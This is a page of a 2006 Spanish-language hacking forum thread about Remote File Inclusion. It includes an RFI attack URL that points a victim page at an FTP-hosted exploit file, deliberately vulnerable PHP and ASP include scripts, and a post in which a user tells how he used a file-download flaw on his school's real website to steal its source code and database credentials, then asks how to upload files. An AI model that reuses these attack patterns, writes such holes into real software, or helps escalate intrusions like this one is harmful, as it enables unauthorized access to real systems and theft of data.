elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Manual de RFI (Remote File Inclusion)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: Manual de RFI (Remote File Inclusion)  (Leído 12,167 veces)
izengabe

Desconectado Desconectado

Mensajes: 28



Ver Perfil
Re: Manual de RFI (Remote File Inclusion)
« Respuesta #10 en: 6 Noviembre 2006, 16:25 pm »

Ok,es buena la alternativa,no la he probado,pero supongo que funcionará.Pero aún así quiero saber la razón por la que a mí no me funciona de la forma original...Si no,no podré dormir... ;)
En línea

~~hAcK yoUr MiNd~~
  ~oKupA tU MeNte~
rakax


Desconectado Desconectado

Mensajes: 341


http://raka.uni.cc


Ver Perfil WWW
Re: Manual de RFI (Remote File Inclusion)
« Respuesta #11 en: 8 Noviembre 2006, 06:09 am »

Si no me equivoco el exploit deberia de ir en otro formato k no sea .php por k se ejecutaria en tu servidor no en el de la victima,asi k seria correcto
Código:
www.pagina.com/ver.php?pagina=ftp://usuario:password@servidor.ftp.com/mixploit.gif
Citar
En línea

Cuanto mas aprendo mas cuenta me doy de lo ignorante que soy.

www.raka.uni.cc
Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: Manual de RFI (Remote File Inclusion)
« Respuesta #12 en: 8 Noviembre 2006, 16:58 pm »

y ahora un script en php vulnerable xD
Código:
<?php
$archivo = $_GET['secc'];
include($archivo);
?>

Y en ASP
Código:
<%
Dim a
a = Request.QueryString("a")
if a <> "" Then
Server.Execute(a)
Else
Response.Redirect("index.htm")
End If
%>
supongo que los dos se entienden, con esto pueden poner en practica esta vulnerabilidad en http://localhost ;)
En línea

rakax


Desconectado Desconectado

Mensajes: 341


http://raka.uni.cc


Ver Perfil WWW
Re: Manual de RFI (Remote File Inclusion)
« Respuesta #13 en: 8 Noviembre 2006, 21:32 pm »

Buenas gracias por el dato pero....
me instale el php y todo y cuando lo corro en localhost lo k me sale es esto
Código:
Notice: Undefined index: secc in c:\program files\easyphp1-8\www\file.php on line 2

Warning: main(): Failed opening '' for inclusion (include_path='.;C:/Program Files/EasyPHP1-8\php\pear\') in c:\program files\easyphp1-8\www\file.php on line 3

Me prece k es k tengo k definir el archivo k se va a abrir con el inclusion pero no entiendo bien.
si es asi como lo hago? (no se php,desgraciadamente)
En línea

Cuanto mas aprendo mas cuenta me doy de lo ignorante que soy.

www.raka.uni.cc
izengabe

Desconectado Desconectado

Mensajes: 28



Ver Perfil
Re: Manual de RFI (Remote File Inclusion)
« Respuesta #14 en: 9 Noviembre 2006, 00:59 am »

Hyde,si no te importa,a ver si puedes echarme un cable con lo que he comentado antes:que no me funciona pasar parámetros por get cuando la extensión del archivo no es php... :rolleyes:
En línea

~~hAcK yoUr MiNd~~
  ~oKupA tU MeNte~
Hyde


Desconectado Desconectado

Mensajes: 453


"El miedo es el camino mas rapido a la muerte"


Ver Perfil WWW
Re: Manual de RFI (Remote File Inclusion)
« Respuesta #15 en: 9 Noviembre 2006, 01:42 am »

No se si entendi bien tu pregunta. Te refieres que al intentar obtener algo no te da :huh:

Para pasar el get debe de estar en php, mandame un privado para pasarte algo que quiza te sirva pero no lo voy a colocar aqui porque es de otra web.

Intenta con demas vulnerabilidades, yo solo puse un ejemplo pero existen muchas maneras mas.

Salu2

Hyde
En línea




uniqdom

Desconectado Desconectado

Mensajes: 84


Ver Perfil
Re: Manual de RFI (Remote File Inclusion)
« Respuesta #16 en: 14 Noviembre 2006, 21:00 pm »

hola.. bueno el manual...
hace poco en la pagina de mi colegio me tope con una pagina  en la cual podia descargar archivos (guias, pruebas, etc...)

se me ocurrio que si modificaba los datos que se enviaban en la url podria obtener el codigo fuente de la pagina.

por ejemplo cambie de http://www.xxxxxx.cl/DescargarArchivo.php?Carpeta=fisica/guias&Archivo=cinematica.doc
http://www.xxxxxx.cl/DescargarArchivo.php?Carpeta=&Archivo=DescargarArchivo.php
y eso fue lo que paso. obtube las fuentes. me pase un rato descargando otras paginas.php hasta que me tope con el user y pass de la base de datos... ahi me surgio otra pregunta, pero es parte de otro tema...



aun no se como poder subir archivos a el servidor.
intente:
http://www.xxxxxx.cl/DescargarArchivo.php?Carpeta=&Archivo=http://www.google.com
y no me salio nada en pantalla. como estaba diseñado para descargar arhcivos pense que el archivo que me mandaba para bajar saldria el codigo html de google... pero no...


les dejo lo que venia en el codigo fuentede la pagina DescargarArchivo.php :
Código:
<?
$Archivo=$HTTP_GET_VARS["Archivo"];
$Carpeta=$HTTP_GET_VARS["Carpeta"];
$enlace = '/home/web/interactivo.maristas.cl/'.$Carpeta.'/'.$Archivo;
header ("Content-Disposition: attachment; filename=".$Archivo."\n\n");
header ("Content-Type: application/octet-stream");
header ("Content-Length: ".filesize($enlace));
readfile($enlace);
?>
 

asumo que el readfile($enlace); es con el que topo. porque supongo que intenta leer el archivo desde el servidor y no fuera.
alguien sabe que podria hacer??
igual voy a seguir buscando...
En línea

Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[webapps / 0day] – PrestaShop <=1.3.6 (cms.php) Remote File Inclusion
Bugs y Exploits
OssoH 2 3,757 Último mensaje 29 Enero 2012, 20:37 pm
por OssoH
Manual Exif 2.1 - EXchangeable Image File Format
Tutoriales - Documentación
Serapis 2 2,844 Último mensaje 4 Julio 2023, 22:55 pm
por Serapis
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines